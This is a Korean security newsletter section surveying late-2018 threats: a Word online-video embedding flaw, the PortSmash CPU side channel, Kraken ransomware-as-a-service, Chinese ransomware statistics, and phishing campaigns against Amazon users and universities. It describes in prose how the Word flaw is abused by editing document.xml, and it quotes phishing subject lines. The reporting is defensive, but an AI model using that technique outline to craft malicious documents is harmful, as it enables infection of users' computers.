04 해외보안동향 1. 영미권 해커가사용자컴퓨터감염에악용할수있는패치되지않은 MS Word 의취약점 발견 Unpatched MS Word Flaw Could Allow Hackers to Infect Your Computer 사이버보안연구원들이마이크로소프트오피스 2016 및이전버전에존재하는패치되지않은논리적결함을 발견했다. 이는공격자가문서파일내부에악성코드를내장시킬수있도록허용해사용자가그들의컴퓨터에서 악성코드를실행하도록속일수있다. Cymulate 의연구원들이발견한이버그는 Word 문서의 온라인비디오 기능을악용한다. 이는유튜브링크를사용해문서에비디오를삽입할수있는기능이다. 사용자가 MS Word 문서에온라인비디오링크를추가하면, 이온라인비디오기능은자동으로 HTML embed 스크립트를생성한다. 이스크립트는사용자가문서에포함된썸네일을클릭하면실행된다. 마이크로소프트는이문제를보안취약점으로인정하기를거부해, 연구원들은이취약점을발견한지 3 개월이지난후 이취약점에대한내용을공개하기로결정했다. 새로운 MS Word 공격은어떻게동작하나요? Word Doc 파일 (.docx) 는실제로미디어및설정파일이포함된 zip 패키지로쉽게오픈및편집이가능하다. 40

04 해외보안동향 연구원들에따르면 Word 가사용하는디폴트 XML 파일이자생성된임베디드비디오코드를포함하는 'document.xml 파일은수정이가능해비디오 iframe 코드를백그라운드에서실행될 HTML 또는 javascript 코드로 바꿔치기할수있다. 간단히말해, 공격자는이취약점을악용해실제유튜브비디오를인터넷익스플로러다운로드매니저에서실행되는 악성코드로변경할수있다는이야기다. xml 파일내부에서유튜브아이프레임코드를포함하는 embeddedhtml 파라미터 (WebVideoPr) 파라미터를찾는다. Document.xml 파일에변경사항을저장하고수정된 xml 파일을포함하여 docx 패키지를업데이트한후문서를 오픈한다. MS Word 에서이문서를오픈하는동안, 어떠한보안경고도나타나지않는다. 이취약점을증명해내기위해, 연구원들은 PoC 공격을만들었다. 이는악의적으로만들어진문서에내장된비디오를 사용자가클릭했을때아무것도다운받지않고, 어떠한보안경고도없는상태에서내장된실행파일을실행한다는 창이뜨는것을보여준다. 이공격을위해서는, 공격자가피해자에게파일을열고내장된비디오링크를클릭하도록속여야한다. 이버그는 MS 41

04 해외보안동향 오피스 productivity suite 2016 및구버전을사용하는사용자들에게모두영향을미친다. 연구원들은마이크로소프트에 3개월전이취약점을제보했지만, 회사는이를보안취약점으로인정하지않았다. 또한마이크로소프트는이문제를수정할계획이없는것으로보이며, 설계된대로 HTML 을적절히해석하고있습니다. 라고만밝혔다. 연구원들은기업담당자들에게 Document.xml 파일내에임베디드비디오태그인 embeddedhtml 를포함한 Word 문서를차단하기를권고했다. 또한최종사용자들은출처를알수없거나의심스러운이메일의첨부파일을오픈하지 말아야한다. [ 출처 ] https://thehackernews.com/2018/10/microsoft-office-online-video.html https://blog.cymulate.com/abusing-microsoft-office-online-video 42

04 해외보안동향 새로운 Intel CPU 취약점, 암호화된데이터를훔치기위해하이퍼스레딩악용해 New Intel CPU Flaw Exploits Hyper-Threading to Steal Encrypted Data 보안연구원팀이 Intel CPU 에서또다른사이드채널취약점을발견했다. 이취약점은공격자가동시멀티스레딩 기술이활성화된동일한 CPU 코어에서실행되는다른프로세스들에서패스워드, 암호화키와같은보호된중요한 데이터를스니핑할수있도록허용한다. PortSmash (CVE-2018-5407) 라명명된이취약점은 Meltdown, Spectre, TLBleed, Foreshadow 를포함해지난해 발견된다른위험한사이드채널취약점들중하나가되었다. 핀란드의 Tampere University of Technology 와쿠바의 Technical University of Havana 연구원팀이발견한이새로운사이드채널취약점은인텔의 SMT( 동시멀티스레딩 ) 구현인하이퍼스레딩기술에존재한다. 동시멀티스레딩 (Simultaneous MultiThreading SMT) 은성능을향상시키기위한기능이다. 이는프로세서의각물리적인코어를스레드라는가상코어로분할해각코어가두개의명령스트림을동시에실행할수있도록한다. SMT 는동일한물리적코어에서두개의스레드를두개의독립적인프로세스에서동시에실행해성능을높이고자한것으로, 한프로세스는또다른프로세스가무슨일을수행하는지에대해놀라울만큼많은양의정보를볼수있다. 따라서, 공격자가악성 PortSmash 프로세스를희생양프로세스와함께동일한 CPU 코어에서실행할경우, PortSmash 코드는각작업에소요되는정확한시간을측정함으로써다른프로세스가실행한작업을스누핑할수있게된다. OpenSSL 복호화키를훔치는 PortSmash 공격연구원들은 GitHub 에공개된 PoC 를이용해 OpenSSL ( 버전 1.1.0h 이하 ) 암호화라이브러리에서 PortSmash 공격을테스트했으며, OpenSSL 스레드 ( 희생양 ) 와동일한물리적코어에서악성프로세스 ( 익스플로잇 ) 을실행시켜성공적으로개인복호화키를훔쳐냈다. PortSmash 공격은현재까지 Intel 의 Kaby Lake 와 Skylake 프로세서에서만동작하는것으로확인되었지만, 연구원들은코드를약간만수정하면 AMD 를포함한다른 SMT 아키텍쳐에서도이공격이동작할것이라고추측했다. 올 8 월, TLBleed 와 ForeShadow 공격이공개되었을때 OpenBSD 의설립자이자 OpenSSH 프로젝트의리더인 Theo de Raadt 는사용자들에게모든 Intel BIOS 들의 SMT/ 하이퍼스레딩을비활성화하도록권고했다. 그는 SMT 는두 CPU 인스턴스간에리소스를공유하며, 공유된리소스는보안장치가부족하기근본적으로망가졌다고볼수 있습니다. 그리고더많은하드웨어버그들및아티팩트들이공개될것으로추측됩니다. SMT 가 Intel CPU 의추측실행과 상호작용하는방식으로인해, SMT 는향후문제의대부분을악화시킬것으로예상합니다. 고밝혔다. 43

04 해외보안동향 PortSmash 공격으로부터시스템을보호하는법연구원들은이새로운사이드채널취약점을 Intel 의보안팀에지난달초제보하였으나, 11 월 1일까지패치를제공하지않아 PoC 익스플로잇을공개하게됐다고밝혔다. 이팀은 PortSmash 공격에대한자세한보고서인 Port Contention for Fun and Profit 을조만간발표할것이라고도밝혔다. Intel 이보안패치를공개하기전까지 PortSmash 취약점을완화시키는가장간단한방법은 CPU 칩의 BIOS 에서 SMT/ 하이퍼스레딩을비활성화하는것이다. OpenSSL 사용자들은 OpenSSL 1.1.1 ( 또는 1.1.0i 이후 ) 버전으로 업그레이드하면된다. AMD 는 PortSmash 사이드채널공격이 AMD 의제품에어떤영향을미치는지조사중이다. [ 출처 ] https://thehackernews.com/2018/11/portsmash-intel-vulnerability.html https://seclists.org/oss-sec/2018/q4/123 44

04 해외보안동향 서비스형랜섬웨어로돌아온 Kraken 랜섬웨어 2.0 Kraken ransomware 2.0 is available through the RaaS model 악명높은 Kraken 랜섬웨어의제작자가악성코드의새로운버전을공개했으며, 다크웹에서 RaaS( 서비스형랜섬웨어 ) 배포프로그램을시작했다. 새로운 Kraken v2 버전은언더그라운드포럼에서광고되고있으며, 서비스형랜섬웨어 (RaaS) 모델을이용해제공된다. 단 50 불만으로도이협력프로그램에신뢰할수있는파트너로써참여가가능하며, 15 일마다 Kraken 랜섬웨어의개선된빌드를받을수있다. 협력자들은지불된랜섬머니의 80% 를받을수있으며, 운영자들은 24 시간지원서비스를제공한다. McAfee 는 Advanced Threat Research 팀과 Recorded Future 의 Insikt 그룹이협업한결과, Kraken 의제작자들이 Fallout 팀의익스플로잇에추가할것을요청했다는증거를발견했다. 이파트너쉽을통해 Kraken 은범죄자고객들을위한새로운악성코드배포방식을갖게되었습니다. 또한 Kraken 랜섬웨어와관련된사용자인 ThisWasKraken 이유료계정을가지고있다는사실도발견했습니다. 유료계정은언더그라운드포럼에서보기힘든편은아니지만, 보통랜섬웨어와같은서비스를제공하는악성코드개발자들은매우신뢰도가높은멤버들이며, 다른고레벨멤버들에게심사를받습니다. 유료계정을가진멤버는보통커뮤니티에서의신뢰도가매우낮습니다. 고밝혔다. Kraken Cryptor 는서비스형랜섬웨어 (RaaS) 협력프로그램이며사이버범죄언더그라운드에 2018 년 8 월 16 일처음 나타났다. 이는 ThisWasKraken 사용자를통해러시아어를사용하는사이버범죄자들의포럼에광고되었다. 9 월말, 보안연구원인 nao_sec 은 Fallout 익스플로잇키트 (GandCrab 랜섬웨어를배포한것과동일함 ) 가 Kraken 랜섬웨어를배포하기시작했다는것을발견했다. 피해자가랜섬머니를지불하면, 협력멤버들은이금액의 20% 를 RaaS 에보내어 ThisWasKraken 으로부터복호화키를받아피해자에게전달해주기만하면된다. 다른위협들과마찬가지로, Kraken Cryptor RaaS 는이전소비에트연합국가들중다수의피해자들은감염시키지 않는다. Recorded Future 는 실제공격에서발견된 Kraken 의최신샘플은시리아, 브라질, 이란의피해자들을감염시키지않습니다. 이로써 ThisWasKraken 이브라질, 이란과관계가있는것으로추측해볼수있으나, 정확하지는않습니다. 시리아가추가된이유는 GandCrab 랜섬웨어에감염된피해자들을도와달라는의미에서추가된것으로추측됩니다. 라고밝혔다. 45

04 해외보안동향 연구원들은이 RaaS 의운영자들이협력자들이 Kraken 샘플파일을안티바이러스서비스에등록하는것을허용하지 않으며, 구매한페이로드에대해서는환불하지않는다고밝혔다. 아래의지도는 Kraken 랜섬웨어의제작자가공개한피해자분포를보여준다. 이는 8 월부터이미전세계 620 명의피해자를감염시켰다. 하지만연구원들은실제캠페인은지난달부터시작한 것으로추측했다. 또한공격자들은이위협을 SuperAntiSpyware 웹사이트의보안솔루션으로위장했다고도밝혔다. 연구원들은사이버범죄언더그라운드에서 RaaS 와협력프로그램이많은범죄자들을양산하고있다는점을강조했다. [ 출처 ] https://securityaffairs.co/wordpress/77650/malware/kraken-ransomware-2-raas.html https://www.recordedfuture.com/kraken-cryptor-ransomware/ https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/ 46

04 해외보안동향 2. 중국 2018 년 10 월중국내랜섬웨어동향분석 감염데이터분석 10 월랜섬웨어감염데이터에대해분석해본결과, 10 월은 9월에비해감염치가소폭감소하였다. 10 월달에감소한원인은주로취약한비밀번호공격에취약한시스템들이감소해서라고추정하고있다. 하지만이러한위험헤직면해있는환경 ( 예를들어원격데스크탑기능, 공유폴더사용, mssql DB 서버, Tomcat 등 ) 은여전히취약한비밀번호공격에노출되어있다. 360 세이프데이터센터의데이터분석결과를보면 10 월 22 일한차례소규모랜섬웨어공격이발생했었다. 이소규모 공격은 GandCrab 랜섬웨어유포로발생한것으로, 주요유포경로는취약한비밀번호를사용하였다. 10 월랜섬웨어악성코드분석결과, GandCrab 패밀리가이전의 Crysis 및 GlobeImposter 패밀리의수치를넘어가장 많이유포된랜섬웨어가되었다. 주요원인을분석해본결과 1) GandCrab 랜섬웨어는블랙마켓에서판매중이며, Split mode(?) 를사용하며, 해당랜섬웨어를구매하는조직이비교적많다. 2) 해당랜섬웨어제작자가 GandCrab 랜섬웨어유포자커뮤니티를만들어랜섬웨어유포자를모집하고기술지원도진행한다. 또한접근할수있는문턱이다른랜섬웨어들보다낮다. 3) GandCrab 랜섬웨어가언급되는신문기사들이많아지고영향력이커짐 ( 예를들어최근시리아의어떤사람이 Twitter 상에서이미죽은자신의아들사진을이용하여도움을구하며 GandCrab 유포한사건등 ) 에따라일정범위에서 유명세 를탔다. 랜섬웨어에감염된시스템을보면 Windows7 이가장많은범위를차지하였다. 9 월과 10 월의감염시스템을비교해본결과, 10 월에서버감염율이상승하였다. 최근몇달동안서버감염비율이 높아지고있는데, 이는서버가공격가치가더높을뿐만아니라, 서버에탑재되어있는서비스들이더많고파급력이더 높기때문으로추정된다. 47

04 해외보안동향 랜섬웨어최신레포트이번달에 Crysis 패밀리와 GlobeImposter 패밀리의감염률이하락하였다. 하지만버전측면에서보았을때이두패밀리랜섬웨어들은끊임없이업데이트를진행하고있으며, 이에따라취약한비밀번호에대한조치는여전히중요하게여겨지고있다. 이번달는확장자를 XXXX 및 BETTA 로붙이는 Crysis 랜섬웨어, 또한확장자를 Help4444 및Crypted_bizarrio@pay4me_in 로변경하는 GlobeImposter 가발견되었다. 또한이번달에 RDP 를통해유포되는 GandCrab 랜섬웨어가 10 월 22 일가장활발히활동하였으며, 취약점을 악용하여유포되는 GandCrab 랜섬웨어의활동은 10 월 25 일가장활발하였다. 10 월 25 일가장정점을찍은주요원인은이전의랜섬웨어버전이이미복호화방법이발견되었기때문에, 랜섬웨어 제작자가해당일에새로운버전의랜섬웨어를공개하였기때문이다. 이전버전의 GandCrab 랜섬웨어감염자들은 360 복호화툴을이용하면 GandCrab 5.0.3 을포함한이전버전들을복호화할수있다. 또한 Satan 은이번달 10 월 15 일활동하기시작하였으며, 10 월 27 일그유포량이최대에달했다. 360 보안연구원은 satan 샘플에대해분석을진행한결과해당랜섬웨어의암호화는복호화할수있으며, 10 월 22 일에 Satan v4.2 에 대한복호화툴이이미나왔다. 이번달에또한새로운랜섬웨어인 sicck 가발견되었다. 해당랜섬웨어는사용자에게복호화댓가로 1 비트코인을 요구한다. 하지만이랜섬웨어가생성하는정보에는문제가있는데, 관리자권한에서만동작하며, 암호화가성공된 이후에만해당랜섬노트를볼수있다. Sick 랜섬웨어를분석할때사용자시스템내의파일들을암호화할때일부폴더에대해암호화를진행하지않고 건너뛰는것을확인하였다. 그중에는 360 관련폴더도있었으며, 이때문에해당랜섬웨어가중국에서제작된것으로 추측되고있다. 공격시스템분포도로보았을때공격대상이되는서버는주로 Windows server2003 이며, Windows 2008, Windows2012 가그뒤를이었습니다. 10 월과 9 월의약한취약점공격추이를본결과 RDP 공격양이증가하였으며, 9 월하루최대공격횟수가 400 만회였다면, 10 월에는하루최대공격횟수가 600 만 ~700 만회에달했다. Mysql 에대한공격은눈에띄게 줄어들었다. [ 출처 ] https://www.anquanke.com/post/id/163745 48

04 해외보안동향 Baidu, 중국기업최초로 Partnership on AI 회원이되었다 미국시간으로 10 월 16 일, Partnership on AI 는중국기업 Baidu 의회원가입을축하하며, 이번협력은 " 진정한글로벌 협력기구로나아가는첫발 " 이라고밝혔다. 바이두와 Partnership on AI 의회원들은 AI 연구표준과글로벌 AI 정책을 만드는데노력할것이다. Partnership on AI 는비영리기업으로 Facebok,Amazon,Google,IBM,MS 가연합하여만든조직이다. 이목적은 AI 가 인공지능의영향을보다잘이해할수있도록미래에 AI 가안전하고투명하며합리적으로개발될수있도록전세계의 다양한목소리를모으는것에두고있다. 이조직의규모가점점커짐에따라, 애플, Intel, 소니등 AI 영역의기업들이끊임없이합류하고있다. [ 출처 ] https://baijiahao.baidu.com/s?id=1612636778779029897&wfr=spider&for=pc 49

04 해외보안동향 3. 일본 인터넷에서도난피해를입은신용카드정보, 눈에띄는 부정트러블 에대한악용 인터넷상에서탈취당한신용카드정보가여행관련부정결제에악용당한케이스가많다며일본사이버범죄대책센터 (JC3) 가주의를권고했다. 피싱메일이나악성코드등을통해서부정으로취득한신용카드정보를이용하여항공권이나숙박시설, 테마파크의티켓등의구입에악용하는 부정트러블 이다수확인되고있다고해서주의를호소한것이다. 일본사이버범죄대책센터에따르면, 범행그룹은일본국내여행에대해정보가많은여행대리점을위장하여할인등을한다고선전하며일본방문을희망하는여행자를유인한다. 여행의신청자에대해서탈취한신용카드정보로결제하여여행을수배한다. 그때얻은예약정보를여행자에게전달하여정규예약을한것으로믿게만들어요금을속여서빼앗고있었다. 부정트러블 의흐름 ( 그림 :JC3) 여행자는부정한결제가이루어진것인지모르고여행을하고그뒤여행관련사업자나신용카드회사등에서 부정결제였다는사실이발각되었다고한다. 또여행중에문제가발각되면, 부정한결제로수배되어있었다는것을 모르고일본을방문한여행자사이에서트러블로발전할가능성도있다. 50

04 해외보안동향 이센터에서는인바운드가증가하는 2020 년도쿄올림픽 / 페럴림픽을목표로 부정트러블 이실태해명이나배제를위해관계자와의연계를강화한다. 또신용카드의탈취에주의를호소하는동시에여행수배를할경우에는신뢰할수있는정규사이트를이용하도록요구하고있다. [ 출처 ] https://japan.zdnet.com/article/35125010/ 51

04 해외보안동향 계정을영구히폐쇄 라고불안을부추기는가짜 Amazon Amzon 이라는기재도 피싱대책협의회는 Amazon 을노리는피싱메일이나돌고있다고해서주의를당부했다. 계정 정지 나 폐쇄 등을 구실로하여불안을부추겨서가짜사이트로유도하려고하고있었다. 이번공격에서는피싱대책협의회가파악하고있는것만해도 5종류의제목을이용한다고한다. 서비스를정지할수없게되거나보안상의리스크가있다는등의설명으로불안을부추기는내용으로, 일부에는제목에수신자의성명이나메일주소를기재하는케이스도있었다. 한편스펠을잘못썼는지필터링에대한대책인지는명확하지않으나제목에서 Amzon 이라는표기를이용하는공격도확인되고있다. 또메일의본문에는 24 시간이내에계정을확인하지않으면계정을영구히폐쇄하겠다고기재한것도있어링크를이용하여가짜로그인화면으로유도하고있었다. HTML 메일을이용함으로써유도처 URL 을은폐하고있으나적어도 7건의유도처가존재한다고한다. 유도처의도메인은 amazon, amazon, amazen 등의문자열을넣어서정규사이트를가장하려고하고있었다. 이협의회에서는유사한피싱공격에주의하도록권고하고있다. 보고를받은메일제목은다음과같다. 사용하시는 Amazon ID 가정지됩니다! 서비스번호 : 사용하시는 Amazon ID 가정지됩니다! [ 수신자의메일주소 ] Amzon 친애하는고객님, 보안리스크를위해고객님의계정은정지되어있습니다. Amzon 친애하는고객님 :[ 수신자성명 ], 계정에보안리스크가있습니다. [ 수신자성명 ] Amazon 계정의서드파티의로그인. 변경해주십시오. 52

04 해외보안동향 피싱메일의예 ( 화면 : 피싱대책협의회 ) [ 출처 ] http://www.security-next.com/099182 53

04 해외보안동향 일본등 14 개국의대학을노리는대규모공격 논문 DB 를가장한피싱으로 지적재산을표적으로 이란이관련된것으로보이는공격그룹 COBALT DICKENS 이일본을비롯하여여러국가의교육기관에대해서피싱공격을전개하고있다는사실이밝혀졌다. Secureworks 가대학의로그인페이지를가장하는피싱사이트를확인했다는사실을계기로공격에이용된 IP 주소에대해서조사한결과, 인증정보의탈취를목적으로한대규모공격캠페인이전개되고있다는사실이판명되었다. 문제의 IP 주소에서는 16 건의도메인을악용한다. 일본을비롯하여미국, 캐나다, 영국, 스위스, 터키, 이스라엘, 오스트레일리아, 중국등적어도 14 개국의 76 개대학, 300 개이상의위장사이트를설치하고있었다. 이회사에따르면표적이된일본국내대학은소수지만, 모두주로영어로작성되어있으며각대학에복수의 피싱사이트가설치되어있었다고한다. 공격대상이된지역의히트맵 ( 그림 :Secureworks) 이들피싱사이트에서는로그인페이지로보이게만들어계정정보를노리고있으며, 사기후에는피싱공격이었다는 것을눈치채지못하도록정규페이지로바뀌는시스템이었다. 일부는논문검색시스템등을위장하고취득한계정정보 등을이용하여지적재산등에접속하고있었던것으로보인다. 이들피싱사이트에대한유도경로는밝혀져있지않지만, 과거의공격경향으로살펴보면대학의라이브러리시스템 등을가장한피싱메일에의해유도되었을가능성이있다. 대학등학술기관에대한피싱공격의경우는메일시스템등을 가장하는수법도적지않지만, 이번캠페인에관해서는확인되지않고있다고한다. 54

04 해외보안동향 공격자는 2018 년 5 월부터 8 월에걸쳐서이들도메인을등록했다. 또 2018 년 5 월에등록한도메인에는타깃으로한 대학의서브메인의문자열등을포함하고있었다. 이번공격에대해서 Secureworks 는이용하는인프라나지적재산의 탈취를노리는수법등, 공격그룹 COBALT DICKENS 이과거에전개한공격과흡사하다고지적한다. 이그룹은이란정부와의관계가지적되고있어 2018 년 3월에는미사법성이관계자로보이는이란인 9명을고발하고있으나그후에도공격을계속하고있는것으로이회사는분석하고있다. 대학에서는최첨단연구를실시하여지적재산을보호하는한편, 보안대책에대한규제가엄격한금융기관이나헬스케어관련사업자에비해보안대책이안이하여공격대상이되고있다고지적하고있다. [ 출처 http://www.security-next.com/099256 55

( 주 ) 이스트시큐리티 ( 우 ) 06711 서울시서초구반포대로 3 이스트빌딩 02.583.4616 www.estsecurity.com 0